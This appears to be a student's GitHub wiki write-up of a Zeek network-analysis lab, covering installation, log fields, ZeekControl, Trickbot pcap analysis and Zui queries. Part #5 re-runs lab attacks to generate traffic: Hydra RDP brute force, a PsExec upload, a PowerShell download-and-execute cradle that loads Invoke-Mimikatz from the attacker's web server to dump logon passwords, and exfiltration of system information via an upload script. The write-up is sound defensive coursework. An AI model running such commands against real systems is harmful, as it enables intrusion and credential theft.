Zeek Lab - jacobwilliams100/sec-440 GitHub Wiki

In this lab, I will be exploring Zeek, a free and open source network analysis utility.

For this lab, we will use the VMs:

  • kali01 (Kali Linux)
  • xubuntu-lan (Xubuntu Linux)

Part #1 - Installing Zeek

Start by SSH'ing from kali01 to xubuntu-lan with ssh username@Linux-ip-address


From here, add the source for Zeek to your repositories with echo 'deb http://download.opensuse.org/repositories/security:/zeek/xUbuntu_22.04/ /' | sudo tee /etc/apt/sources.list.d/security:zeek.list


Then download Zeek with curl -fsSL https://download.opensuse.org/repositories/security:zeek/xUbuntu_22.04/Release.key | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/security_zeek.gpg > /dev/null


update with sudo apt update and install with sudo apt install zeek-6.0



We need to create a new directory /traffic with mkdir ~/traffic


Now we need to edit the .bashrc config file with nano ~/.bashrc

Then add these lines to the bottom of the file:

export PATH


Then save and exit

Then reload .bashrc with source ~/.bashrc

Then, check the installed version of zeek with ```zeek --version

Deliverable #1.1 – Show the version number of Zeek after installing it on your Linux system


Zeek 6.0.8 is installed

Part #2 – Capturing and Analyzing Network Traffic

Start by navigating to the ~/traffic directory with cd traffic

Let's start a capture with sudo /opt/zeek/bin/zeek -i <interface> –C -w traffic.pcap


HINT: if you don't know what your interface is called, you can find it with ifconfig

While the capture is running, open another SSH session in another terminal and ping google.com (cancel it after a few hits)


Then end the capture on the first terminal with ctrl+c


Now run file traffic.pcap

Deliverable #2.1 – Run the Linux β€˜file’ command against the traffic.pcap file and provide a screenshot of the result.


Now we will analyze the capture file, use this command: sudo /opt/zeek/bin/zeek –Cr traffic.pcap


See the new files created with ``ls```

Deliverable #2.2 – How many files were created, and what do they represent?


4 new files were created:

  • conn.log - connection summaries

  • dns.log - DNS requests and responses

  • packet_filter.log - packet filter configuration and behavior

  • reporter.log - errors and warnings

Do cat conn.log | column -t | less -S to view the whole table in a readable way

Deliverable #2.3 – Check the contents of the β€œconn.log” file. What does the headers in the file mean, and what do values such as (ts, uid, id.orig_h, id.orig_p, etc) represent?


For some reason, the column labels were offset each one to the right, so to read it, we need to look at the columns one to the left of the label.


  • #separator - The character used to separate fields in the log.

  • #set_separator - character used to separate multiple values within a single field

  • #empty_field - character used to designate empty or void field

  • #unset_field - character used to specify when a field is not applicable

  • #path - specifies what type of log file is is (conn in this place)

  • #open - timestamp of when the recording started

  • #fields - the types of data contained within the log

  • #types - the form the data takes (count, string, etc)

  • #close - timestamp of when the recording ended

Value Fields:

  • ts - timestamp of connection

  • uid - unique string of characters assigned for connection to identify it

  • id.orig_h - IP address of the machine that initiated the connection

  • id.orig_p - port number on the originating machine

  • id.resp_h - responding IP address

  • id.resp_p - port number of the responding host

  • proto - protocol #

  • service - function associated with the connection if possible (ex DNS)

  • duration - duration of connection in seconds

  • orig_bytes - Number of bytes sent by originating host

  • resp_bytes - Number of bytes sent by responding host

  • conn_state - state of the connection

  • local_orig - Whether the originating host is on the same network as the monitored network

  • local_resp - Whether the responding host is on the same network as the monitored network

  • missed_bytes - Number of bytes lost

  • history - String representing events/states connection went through

  • orig_pkts - Number of packets sent by originating host

  • orig_ip_bytes - Number of bytes sent by originating host

  • resp_pkts - Number of packets sent by responding host

  • resp_ip_bytes - Number of bytes sent by responding host

  • tunnel_parents - Connection from which current connection originates (used with encapsulation and tunneling)

This is a LOT of info! let's cut it down to a smaller amount of information with zeek-cut

do: cat conn.log | zeek-cut id.orig_h id.orig_p id.resp_h id.resp_p proto

Deliverable #2.4 – What are the results displayed, and how could we add to those results the duration and a unique identifier for each entry?


What we get is the originating IP, originating port, responding IP, responding port, and protocol for each connection, in that order.

If we wanted to add duration, we simply need to add uid and duration to the command string.

The command that lists all seven of these fields would look something like this:

cat conn.log | zeek-cut uid id.orig_h id.orig_p id.resp_h id.resp_p proto duration


Now we will create a new capture, this time instead of just pinging google.com, we will also:

  • ping champlain.edu

  • curl ashemery.com (curl https://ashemery.com/index.html)

  • Download the SysInternal suite (use wget https://download.sysinternals.com/files/SysinternalsSuite.zip)




Deliverable #2.5 – Where did you find the details for the domains you accessed in your testing? Provide answers for each of the three tests you made at the beginning of this part of the lab.

The key to finding domain details lies in one of the other zeek files, dns.log


We can use zeek-cut against this file as well. Say we only want to look at timestamp, uid, protocol, domain name, query type number, query type name, and result of query (in that order)

We will use cat dns.log | zeek-cut ts uid proto query qtype qtype_name rcode_name | column -t -s $'\t' (the bit on the end is to fix the formatting)


Here, we can see a bit of domain data about the four domains we interacted with during the test session: google.com, champlain.edu, ashemery.com, and download.sysinternals.com

Part #3 – Configuring Zeek using ZeekControl

We can control Zeek by invoking it directly from the Linux Terminal like this, but we can also control it using the ZeekControl shell which is more convenient and offers a more advanced feature set.

To start the ZeekControl shell, do sudo /opt/zeek/bin/zeekctl (the sudo is necessary)


Deliverable #3.1 – What are the results for the following:

1. Status of Zeek

run status


The status is stopped

2. Type of deployment

run nodes


The deployment type is standalone

3. Where is it running

We enter config



Zeek runs from /opt/zeek/bin/zeek

4. When did it start

If we deploy zeek from the ZeekControl command prompt with deploy, then run status again, it will tell us when the capture started


NOTE: to make this work I needed to modify /opt/zeek/etc/node.cfg and change the interface to ens160


Deliverable #3.2 – Answer based on that the following:

You can also use the help command to learn more about other commands


1. Print the disk usage stats

Use df


2. What scripts are currently loaded

Use scripts


plus many more

3. What does the deploy command do

ZeekControl deploy will do the following things:

  • If deploying for the first time: Performs initial setup, starts Zeek
  • Restarts Zeek Service
  • Updates configuration (applying any changes made to config and script files)


4. Where is the zeekbase and zeekscriptdir for Zeek

We find this with config


zeekbase is at /opt/zeek

zeekscriptdir is at /opt/zeek/share/zeek

5. What is the running version of Zeek

This is also found with config


Version is 2.5.0-24

6. Where are the logs of Zeek stored

Also found with config


The location is /opt/zeek/logs

Now, we exit the ZeekControl shell with exit


Part #4 - Using Zeek Scripts

Zeek can run custom-made scripts for more advanced features. In this section, we will run a script to extract all the files that were seen within the Pcap. Old zeek secripts use the .bro extensions and new ones use .zeek

On xubuntu-lan, use Firefox to download the four zip files from here: https://drive.google.com/drive/u/1/folders/1aiiRUa1Iy6SejtSYYiaR4wPn8wwwlvO9


Then move each to a separate directory and unzip


You may need to install unzip with sudo apt install unzip

Now, back on the ssh session from kali, navigate to /home/champuser/environment (or wherever you put the infection-in-AD-environment file)


and run sudo /opt/zeek/bin/zeek –Cr 2018-05-24-Trickbot-infection-in-AD-environment.pcap extract-all-files.zeek


Then change to the directory with Trickbot-infection-on-single-host


And run sudo /opt/zeek/bin/zeek –Cr 2018-05-24-Trickbot-infection-on-single-host.pcap

Deliverable #4.1 – After running the previous command, what changed in the directory where the results are stored?


Running zeek created new files in both directories.

For Trickbot-infection-on-single-host.pcap...

  • conn.log
  • dns.log
  • files.log
  • http.log
  • packet_filter.ing.log
  • pe.log
  • ssl.log
  • x509.log

For Trickbot-infection-in-AD-environment.pcap...

  • analyzer.log
  • dce_rpc.log
  • files.log
  • kerberos.log
  • packet_filtering.log
  • smb_files.log
  • ssl.log
  • x509.log
  • conn.log
  • dns.log
  • http.log
  • ntlm.log
  • pe.log
  • smb_mapping.log
  • weird.log
  • plus a new folder of extracted files


Deliverable #4.2 – How can we check what file types are extracted?

For the log files, we can tell that they are log files by the .log file extension.

For the extracted files in ~/environment/extract_files, they have no file extensions. But if we poke around in a few, we can see that they are raw network captures of the listed protocols (HTTP, SSL, SMB)

Naturally, the SSL and SMB ones are pretty unreadable due to encryption



However, the HTTP ones have readable data about system configurations and network connections that we can analyze


Deliverable #4.3 How can we identify each file and from where it was downloaded?

We can identify the files by looking in their names for protocol and (in the case of HTTP) reading the contents manually.

We can identify each file by the string of characters at the end of its name, this is its uid. This is also the key to figuring out where it was downloaded from.

If we look in another of the log files, files.log we can get more detailed information about the files. To put it in a readable format, do column -t files.log | less -S

Be wary that all the columns will be offset one to the left like earlier.

If we look under the id.orig_h field, we can see the packet's originating IP address (where it was downloaded from).

We can match the entries in files.log to the files themselves in /extract_files/


Part #5 - Sliver C2 Traffic Analysis

In this section, we will redo some of the attacks from the Sliver C2 - Part 2 Lab to generate some traffic for us to analyze using Zeek.

Task #1 - You are required to redo the RDP Brute Force Attack

We will do this with Hydra

Install Hydra with sudo apt install hydra


Create users.txt and passwords.txt (make sure you have at least one legitimate combination)


Start a new capture


Now in another window, run hydra against wks1 using users.txt and passwords.txt


Then stop the capture


New files will be created without manually extracting the capture because Zeek was deployed earlier


One of these id rdp.log which contains details about Remote Desktop Protocol, the thing Hydra uses

If we view the contents of rdp.log with cat rdp.log | column -t | less -S we can see this information in an organized way

Deliverable #5.1 – Explain with screenshots as proof which files will you use to analyze the traffic generated by Task #1. How will you do that?


(the column offset issue sadly persists)

We can see the IP ( for all, as expected), port (3389 for RDP) and, most importantly, the user of the attempted login with the cookie string header

We can also find information about RDP encryption in ssl.log



At this point, I realized that promiscuous mode would allow ubuntu-lan to see traffic between other hosts on the same network, such as kali01 and wks1. I could have simply repeated the last step (Hydra) from the Sliver C2 part 2 lab on kali01. There was no need to redo the Hydra installation on ubuntu-lan but it is done anyway so I will simply proceed. But I will complete the next tasks using kali01 and wks01.

Task #2 - You are required to redo the PsExec task

Starting a capture (in a new folder, preferably)


Use the active session to wks01 to upload PsExec64.exe as ps.exe


Running ps.exe on wks01 to get domain login


Stopping capture


Notice we have new files now


Deliverable #5.2 – Explain with screenshots as proof which files will you use to analyze the traffic generated by Task #2. How will you do that?

This task required two major actions, uploading PSExec64.exe to wks01 (which uses GoLang's OS package command handler to create a file and write to it over SSH ) and wks01 logging into ad01 (which uses Kerberos)

To analyze the uploading of PSExec64.exe we will look in conn.log with cat conn.log | column -t | less -S


We can see that this traffic represents the transmission of PSExec64.exe because the IP addresses match ( (kali) to (wks01)) and it contains the largest number of bytes (which represents a file being transferred over)

To analyze wks01 logging into ad01 we will look in kerberos.log with cat kerberos.log | column -t | less -S


Notice, this shows connections from wks01 ( to ad01 ( and shows information about the username and domain being requested on Kerberos.

Task #3 - You are required to redo the Running Mimikatz Directly from Memory

Things are mostly still set up from the Sliver C2 Part 2 lab, so we will go ahead and start the process

Once again, we start a new capture (in a new folder)


use the active session, start a shell and download Mimikatz from the kali web server to memory with:

(New-Object System.Net.WebClient).DownloadString('') | IEX

and run Mimikatz with Invoke-Mimikatz -Command "sekurlsa::logonpasswords


We should get similar output from last lab. Once you get the output, close the session


And end the capture


There will now be new log files to look through!


Deliverable #5.3 – Explain with screenshots as proof which files will you use to analyze the traffic generated by Task #3. How will you do that?

This operation consisted of two seperate actions, the process of downloading Mimikatz to memory from the kali web server ( using HTTP, and actually running Mimikatz to dump logged-in credentials from memory. Only the former action creates network traffic.

For the download operation, we can find the details in http.log

We can view the details with cat http.log | column -t | less -S

In this file, we can see where wks-01( downloaded the file /files/Invoke-Mimikatz.ps1 from kali01 ( on port 80 (HTTP non-secure) using the GET method


Task #4 - You are required to redo the Exfiltration using hte up.ps1 PowerShell script.

Like the last step, stuff is mostly already set up to do this again (PHP, web server, upload script)

We start a capture (once again, in a new folder)


We enter the session to wks1, start a *shell, and put the output of a few system information commands into C:\Users\Public\Documents\info.txt

Then switch directories to C:\Users\Public\Documents and run the up.ps1 script


Check to see if info.txt is in /var/www/html/uploads


Then end the capture


Deliverable #5.4 – Explain with screenshots as proof which files will you use to analyze the traffic generated by Task #4. How will you do that?

There will now be new log files created by Zeek.

The part of this task that produces traffic is running the up.ps1 script to upload info.txt to /var/www/html/uploads on kali01 ( This uses HTTP (non-secure) which is port 80 and will use the POST method.

Because of this, we will find it in the http.log file. Do this with cat http.log | column -t | less -S


Here, we can see many of the details about the upload, including the IPs ( to the port (80) the HTTP method (POST) and the PHP page used (upload.php)

We can even see the reponse code (200 OK)


Part 6 - Traffic Analysis using Zui

In this part, we will be using Zui a GUI-based tool for Zeek to analyze some pcap files to search for malicious traffic.

I was having some issues with slow connectivity to vcenter from my host PC, so I decided to complete this section on my host PC.

Start by downloading Zui from https://www.brimdata.io/download/ and installing




Then download the infected capture files from https://malware-traffic-analysis.net/2018/05/24/index2.html and put them in a separate folder



Load the captures into ZUI

Deliverable #6.1 – Show all of the executables that were downloaded and are seen within the β€œ2018-05-24-Trickbot-infection-in-AD-environment.pcap” file.

I identified two .exe files downloaded (using SMB):

  • \WINDOWS\lgwgf4lrucfcaa_vo6bqb08eo1nja1f4d_h2dnradrkw11hvguuphvk__7sg7rwb.exe
  • \WINDOWS\44783m8uh77g8l8_nkubyhu5vfxxbh878xo6hlttkppzf28tsdu5kwppk_11c1jl.exe




Deliverable #6.2 – Find a way to apply filters based on smb and find which null session connection was attempted to a domain not an IP address.

After doing some reasearch, I found that smb_mapping.logcontains mappings between SMB shares and associated domain names, so this is what I need to be querying.

These two connections seem to indicate that they are SMB "null session" because of the "null" service field, being port 445 (SMB) and including a domain path (dynatuning.com)


If we search the other logs for connections matching these uids, we can extract more details



Deliverable #6.3 – Find a way to apply filters based on http and find all the files that were downloaded and had the user-agent β€œWinHTTP loader/1.0”.

This was easier. I just needed to set the _path to "http" and search for entries where the user agent was equal to "WinHTTP loader/1.0"


This query shows the download of two files from the IP

  • toler.png
  • table.png


Part #7 - Reflection

This was the second most challenging lab yet. Zeek is certainly a very powerful tool, but has a steep learning curve. I did research online to learn about the different types of Zeek .logs In the process of trying to read the log files, I learned about some different ways of displaying dense text in the Linux CLI, especially the column utility, which helped me better format the raw data for easier analysis. I also came across various commands and options for filtering and parsing logs efficiently, such as using grep, awk, and cut to extract relevant data from the logs. Zui was challenging at first because I did not know how to write queries for it, but after reading some online guides, I figured out how to write rudimentary queries to find specific packets I was looking for. I definitely see why it is more useful than reading through the .log files manually.

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